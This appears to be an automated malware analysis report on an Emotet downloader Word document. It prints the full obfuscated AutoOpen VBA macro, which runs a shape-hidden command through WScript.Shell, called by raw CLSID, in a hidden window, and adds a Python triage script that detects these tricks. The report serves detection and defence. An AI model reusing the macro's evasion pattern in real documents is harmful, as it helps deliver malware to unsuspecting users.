Verdict: MALICIOUS
Risk Score: 252
Malware Insights
MITRE ATT&CK
- T1059.003 Windows Command Shell
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains a VBA AutoOpen macro that instantiates the WScript.Shell COM object by its raw CLSID, GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8"), rather than by the WScript.Shell ProgID, and then calls its Run method with window style 0 (hidden window). The command line is not present in the macro source: at run time it is read from the text frame of a document shape named "zcYICaAl" and concatenated with several undefined (therefore empty) variables, so the macro text alone does not reveal what is executed. The rest of the macro is padding: dead Select Case blocks on uninitialised variables and randomly generated identifier names. The recovered command invokes cmd.exe with an execution flag; it is heavily obfuscated but appears to construct a URL and download a second-stage payload. Together with the ClamAV signature, these findings indicate a downloader variant of the Emotet family.
Heuristics (9)
- ClamAV: Doc.Downloader.Emotet-6826431-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-6826431-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID [critical] OLE_VBA_GETOBJECT_CLSID_DANGEROUS: VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. Here the CLSID 72C24DD5-D70A-438B-8A42-98424B88AFB8 is WScript.Shell; the appended variable wBTbjNzMR is never assigned, so it is empty and the moniker string is unchanged at run time. Matched line in script:
  End Select Set FqTTzQNYu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + wBTbjNzMR) On Error Resume Next
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call. Matched line in script:
  End Select Set FqTTzQNYu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + wBTbjNzMR) On Error Resume Next
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:
  Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next
- Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD: Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. By itself this marker is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution. The heuristic's generic description assumes that no modern VBA project was recovered and no stronger macro-virus family marker was present; for this sample a VBA project was recovered (macros.bas, listed under Extracted artifacts), so the marker corroborates the OLE_VBA_AUTOOPEN finding rather than standing on its own.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI carried by any Office document that contains shapes; it is not a download or command-and-control address.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5749 bytes |

SHA-256: 741a5d0d0e0d2f2f26ad79d991a1e862a361b8149aa7ff831a277278eb5c7876
Detection:
- ClamAV: No threats found (the Doc.Downloader.Emotet signature above fired on the document itself, not on this decoded macro text)
- Obfuscation or payload: likely. 105 of 156 identifiers look randomly generated (e.g. 'KiQHBHzjqo'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "NfhRrib"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case VLdwEK
Case 15131936
GCJFwzJmV = 312165642
ZrCbQzsSd = CLng(327202709)
Case 226308632
JJjUjGL = Oct(tBOJWbzr)
ZLpzoPW = kNwLsY
Case 294776129
czvPccj = CDate(MwXdtE)
BAwElsbV = Int(306937547 * BvtOWA)
End Select
On Error Resume Next
Select Case kMLDHOmm
Case 127526074
wckwbvXXl = 10628416
aVzNNi = CLng(57406342)
Case 295022822
kpqLimBJ = Oct(zHZiznMB)
uAilh = QJqMq
Case 301667795
iulJGlZN = CDate(uOsmuurY)
BMaNsz = Int(334639252 * qvYvp)
End Select
On Error Resume Next
Select Case cQVTLE
Case 63613879
FtwBZR = 103661861
iurwmSUKv = CLng(251765696)
Case 285218744
ASJwwk = Oct(QQditjtBS)
wzmrMi = oEjJwLXZN
Case 324437860
njzDoS = CDate(cFPzOsQBs)
mEUnnNKtE = Int(269297437 * FFFjmf)
End Select
On Error Resume Next
Select Case kZGcod
Case 27149875
MdLdj = 200518866
ALBYmXoGX = CLng(225338729)
Case 149182203
zZIPFE = Oct(LFjQQSCS)
liGuw = kwlHSpwS
Case 228198655
RPGfEOFYz = CDate(rRvkFk)
jVobb = Int(115288969 * pMiwm)
End Select
Set TvLTskZj = Shapes("zcYICaAl")
On Error Resume Next
Select Case bpLNaWYN
Case 170293607
btZLYAWnp = 122552508
SiIkU = CLng(282292005)
Case 302299572
HoGtPz = Oct(QpnJvqrEw)
FHzJjaXNh = HDdFj
Case 201988746
SCVzKLdkj = CDate(fWOaiLqOj)
IXOifhqnM = Int(77471184 * dRuYBatv)
End Select
On Error Resume Next
Select Case siRVEHKw
Case 328682984
LnimNzKiZ = 339408030
cAift = CLng(330037178)
Case 94407295
zuQvYZkD = Oct(iUjhFh)
hlhjKc = mtfQh
Case 257934290
LJwJwCvr = CDate(NdtrD)
TYWTS = Int(334976911 * QicXm)
End Select
On Error Resume Next
Select Case UzWMI
Case 50940566
jjRbbU = 78212833
zhmufTlf = CLng(325890287)
Case 141247575
kisAiR = Oct(RBKJXcw)
uLFKOFA = UoLvP
Case 283886450
TZrpXjqf = CDate(KzCKVoJK)
GYaZmHNjX = Int(161537658 * SVOaTq)
End Select
On Error Resume Next
Select Case IcOnZTZf
Case 12214148
JplwhAHp = 153678308
LDbAw = CLng(208601453)
Case 84029814
jDwaVY = Oct(YOwYAO)
hliBDQaJM = TXVFBNrt
Case 42579489
wwliTN = CDate(IlLRXuSV)
VucvoWrMG = Int(327251806 * GXAEi)
End Select
KiQHBHzjqo = "" + JDQiSKjY + QpfUDRk + TvLTskZj.TextFrame.TextRange.Text + hbPRpN + ZHtNUqD + cMktjA
On Error Resume Next
Select Case jZBKIi
Case 8276858
NPJmflS = 186192330
mTlTr = CLng(226914952)
Case 207270491
rduGAzLb = Oct(vwRVTUizb)
KbwCQE = iJcqrr
Case 146621912
RAGQNSw = CDate(jpTKl)
wDUQRU = Int(66224729 * adBjOBzFD)
End Select
Set FqTTzQNYu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + wBTbjNzMR)
On Error Resume Next
Select Case zZIPYUA
Case 541397
QSuNCVO = 233435738
saiREHjb = CLng(56873109)
Case 97211930
kZMVu = Oct(OznORN)
QEYKIQMp = ipppfVBj
Case 322489168
lwqqFY = CDate(lGOvRa)
wAziZT = Int(291729254 * OEvWj)
End Select
On Error Resume Next
Select Case hiswVivQG
Case 233192990
liqwiwm = 163074422
tWpMw = CLng(43829233)
Case 176409652
FkvKi = Oct(HmmdPUW)
mzmucNAMd = DZzLojCOH
Case 278426237
VnQHJi = CDate(sTWElC)
sZCiNEsH = Int(338007662 * EWwzG)
End Select
Const iflKAuswi = 0
On Error Resume Next
Select Case zmwZRf
Case 20356153
iVqvDwlRB = 181861349
hjWGrmK = CLng(75256157)
Case 271310302
SwwLptN = Oct(dPnXl)
CjONpTOBY = NkdjH
Case 251644728
UNdLX = CDate(jNCYMXMkK)
jDKYwVWGR = Int(171246929 * wFQhzrITJ)
End Select
On Error Resume Next
Select Case olsGnSksb
Case 202738348
LvMtrlDkD = 127267149
GnvRMapCt = CLng(272692696)
Case 232593572
LjtBnSiv = Oct(iDbZV)
LaCncj = fEKWFJDZ
Case 245228971
cGBKw = CDate(QRYYwXkT)
rMdbqCGIX = Int(22600673 * qQNVrdzz)
End Select
FqTTzQNYu.Run! KiQHBHzjqo, iflKAuswi
On Error Resume Next
Select Case zURlkio
Case 294353168
ADowIECwu = 31374145
TNPQTGj = CLng(206168440)
Case 283664432
SlNBFzjER = Oct(hBFiXOpF)
sVZAZL = EBRdzIBB
Case 223332389
bwCHSs = CDate(PtRHhtF)
dOwTtl = Int(259411127 * VsinnqYAE)
End Select
End Sub
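The macro above hides everything that matters behind three layers of indirection: the COM class is named by CLSID instead of ProgID, the command line lives in a document shape rather than in the code, and the window style passed to Run is a named Const. The following Python is an added example for this page, not the analyzer's own heuristic code, showing how a static triage script can resolve each of those layers from decoded VBA source. It assumes a small table of well-known execution-capable CLSIDs (WScript.Shell, Shell.Application, Scripting.FileSystemObject, as registered on Windows) and runs over SAMPLE_VBA, a macro constructed here after the report's pattern rather than the extracted macros.bas. It goes slightly beyond this sample by resolving integer literals as well as Const names for the window style and by accepting any CLSID in the table.

```python
"""Static triage of decoded VBA for the indirection tricks in this report: COM
instantiation by raw CLSID, a Run command read from a document shape, a hidden
window style, and random-looking identifiers.  Added example, not the analyzer's
code; DANGEROUS_CLSIDS are well-known registry values, SAMPLE_VBA is constructed."""
import re

# Execution-capable COM classes by CLSID (well-known Windows registry values).
DANGEROUS_CLSIDS = {
    "72C24DD5-D70A-438B-8A42-98424B88AFB8": "WScript.Shell",
    "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Shell",
    "13709620-C279-11CE-A49E-444553540000": "Shell.Application",
    "0D43FE01-F093-11CF-8940-00A0C9054228": "Scripting.FileSystemObject",
}

# VBA keywords and Office/WSH member names; anything else is a user-chosen identifier.
VBA_WORDS = set("""attribute sub end function on error resume next goto set let dim as
const if then else elseif select case call do loop while wend for to step each in exit
true false nothing and or not is new me with private public option explicit integer long
string variant object boolean byte double single date redim preserve autoopen
document_open auto_open workbook_open shapes textframe textrange text activedocument
fullname getobject createobject run exec shell clng cdate cstr chr oct int""".split())

AUTO_EXEC = re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
                       r"(AutoOpen|Document_Open|Auto_Open|Workbook_Open)\b", re.I | re.M)
CLSID_OBJ = re.compile(r'Set\s+(\w+)\s*=\s*GetObject\s*\(\s*"new:\{?([0-9A-Fa-f-]{36})\}?"', re.I)
SHAPE_OBJ = re.compile(r'Set\s+(\w+)\s*=\s*Shapes\s*\(\s*"([^"]+)"\s*\)', re.I)
RUN_CALL = re.compile(r"^\s*(\w+)\s*\.\s*Run!?\s+(\w+)\s*,\s*(\w+)", re.I | re.M)  # "Run!" tolerated
CONST_DEF = re.compile(r"^\s*Const\s+(\w+)\s*=\s*(-?\d+)", re.I | re.M)
ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+)$", re.M)

# Constructed sample modelled on the report's macro (not the page's macros.bas).
SAMPLE_VBA = '''Attribute VB_Name = "NewMacros"
Sub AutoOpen()
On Error Resume Next
Dim docPath As String
docPath = ActiveDocument.FullName
Set TvLTskZj = Shapes("zcYICaAl")
KiQHBHzjqo = "" + JDQiSKjY + TvLTskZj.TextFrame.TextRange.Text + hbPRpN
Set FqTTzQNYu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + wBTbjNzMR)
Const iflKAuswi = 0
FqTTzQNYu.Run! KiQHBHzjqo, iflKAuswi
End Sub
'''

def strip_noise(src):
    """Drop Attribute lines, string literals and comments so only code tokens remain."""
    src = re.sub(r"^\s*Attribute\b.*$", "", src, flags=re.M)
    src = re.sub(r'"(?:[^"\n]|"")*"', '""', src)  # strings first: they may contain apostrophes
    return re.sub(r"'.*$", "", src, flags=re.M)

def looks_random(ident):
    """Name-mangling heuristic: in camelCase an inner capital has lowercase on both sides;
    capitals next to another capital or at the end are 'odd'.  Two or more odd capitals
    mark a generated name.  Undercounts (misses all-lowercase junk), never overclaims."""
    if len(ident) < 5 or "_" in ident:
        return False
    odd = 0
    for i in range(1, len(ident)):
        if ident[i].isupper() and (ident[i - 1].isupper() or i == len(ident) - 1
                                   or ident[i + 1].isupper()):
            odd += 1
    return odd >= 2

def identifier_stats(src):
    """(random-looking, total) over the unique user identifiers in the macro."""
    tokens = set(re.findall(r"\b[A-Za-z_]\w*\b", strip_noise(src)))
    idents = [t for t in tokens if t.lower() not in VBA_WORDS]
    return sum(looks_random(t) for t in idents), len(idents)

def command_source(src, cmd_var, shapes):
    """Shape name whose TextFrame feeds the Run argument, 'macro' if the string is
    built in the macro itself, 'unknown' if no assignment to cmd_var is found."""
    for name, rhs in ASSIGN.findall(src):
        if name.lower() != cmd_var.lower():
            continue
        for var, shape in shapes.items():
            if re.search(rf"\b{re.escape(var)}\.TextFrame\.TextRange\.Text\b", rhs, re.I):
                return shape
        return "macro"
    return "unknown"

def triage(src):
    """Resolve CLSID objects, shape indirection and the Run window style for one macro."""
    shapes = dict(SHAPE_OBJ.findall(src))
    clsid_objs = {v: (c.upper(), DANGEROUS_CLSIDS.get(c.upper())) for v, c in CLSID_OBJ.findall(src)}
    consts = {k.lower(): int(n) for k, n in CONST_DEF.findall(src)}
    runs = []
    for obj, cmd, style in RUN_CALL.findall(src):
        window = int(style) if style.isdigit() else consts.get(style.lower())
        runs.append({"object": obj, "progid": clsid_objs.get(obj, (None, None))[1],
                     "command_var": cmd, "command_source": command_source(src, cmd, shapes),
                     "window_style": window, "hidden": window == 0})  # 0 = hidden window
    n_random, n_total = identifier_stats(src)
    return {"auto_exec": AUTO_EXEC.findall(src), "clsid_objects": clsid_objs,
            "shape_objects": shapes, "runs": runs,
            "random_identifiers": n_random, "identifiers": n_total}

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

On the constructed sample, triage() resolves FqTTzQNYu to WScript.Shell, reports that the Run argument comes from shape "zcYICaAl" rather than from the macro, resolves iflKAuswi to window style 0 (hidden), and counts 7 of 8 user identifiers as random-looking. The practical consequence for the report's sample is the same: the command line has to be pulled from the shape text in the document body (or observed dynamically), because the decoded macro never contains it.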